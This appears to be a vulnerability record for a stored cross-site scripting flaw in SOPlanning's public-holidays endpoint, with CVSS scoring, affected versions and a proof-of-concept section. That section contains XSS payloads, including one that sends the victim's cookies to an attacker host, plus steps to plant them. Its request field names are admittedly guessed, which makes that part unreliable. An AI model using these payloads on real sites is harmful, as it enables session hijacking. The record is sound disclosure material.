Security Vulnerability Report
CVE-2025-62731 CVSS 4.8 MEDIUM

CVE-2025-62731

Published: 2025-11-20 16:16:00
Last Modified: 2025-11-24 13:53:28

Description

SOPlanning is vulnerable to stored XSS in the /feries endpoint. A malicious attacker with access to the public holidays feature is able to inject arbitrary HTML and JavaScript into the website, which is rendered/executed when multiple pages are opened. By default only administrators and users with special privileges are able to access this endpoint. This issue was fixed in version 1.55.

CVSS Details

CVSS Score: 4.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* - VULNERABLE
SOPlanning < 1.55

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-62731 Stored XSS PoC for SOPlanning /feries endpoint
// This PoC demonstrates the XSS injection in the public holidays feature
// Payload: <script>alert(document.cookie)</script>
// Or a more sophisticated payload for session hijacking:
// <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">
// Steps to exploit:
// 1. Log in to SOPlanning with an admin or privileged user account
// 2. Navigate to the /feries endpoint (holiday management page)
// 3. Add a new holiday with the XSS payload in the name/description field
// 4. Save the holiday; the payload is stored in the database
// 5. Any user viewing holidays or related pages will trigger the XSS
// Example HTTP POST request to the /feries endpoint.
// NOTE: the field names below (name, date, description) are illustrative;
// the actual /feries form parameters are not given in this record.
const pocPayload = {
  method: 'POST',
  path: '/feries',
  body: {
    name: '<script>alert(String.fromCharCode(88,83,83))</script>',
    date: '2025-01-01',
    description: '<img src=x onerror=fetch("https://attacker.com?c="+document.cookie)>'
  }
};
// The injected script will execute when:
// - Viewing the holidays list
// - Viewing the calendar with holidays displayed
// - Any page that renders holiday information

References

https://cert.pl/en/posts/2025/11/CVE-2025-62293 (Third Party Advisory)
https://www.soplanning.org/en/ (Product)

Additional Record Data

Source identifier: [email protected]
Vulnerability status: Analyzed
Weakness: CWE-79 (Cross-site Scripting)
Affected versions: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* with versionEndExcluding 1.55.00 (match criteria ID C84D5087-6ED4-47E4-9E68-F1881726E7D2)

CVSS 3.1 (Primary): 4.8 MEDIUM
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Attack Vector: NETWORK, Attack Complexity: LOW, Privileges Required: HIGH, User Interaction: REQUIRED, Scope: CHANGED
Confidentiality: LOW, Integrity: LOW, Availability: NONE
Exploitability Score: 1.7, Impact Score: 2.7

CVSS 4.0 (Secondary): 5.1 MEDIUM
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: NETWORK, Attack Complexity: LOW, Attack Requirements: NONE, Privileges Required: LOW, User Interaction: PASSIVE
Vulnerable system impact: Confidentiality NONE, Integrity NONE, Availability NONE
Subsequent system impact: Confidentiality LOW, Integrity LOW, Availability NONE
(All supplemental and environmental metrics: NOT_DEFINED)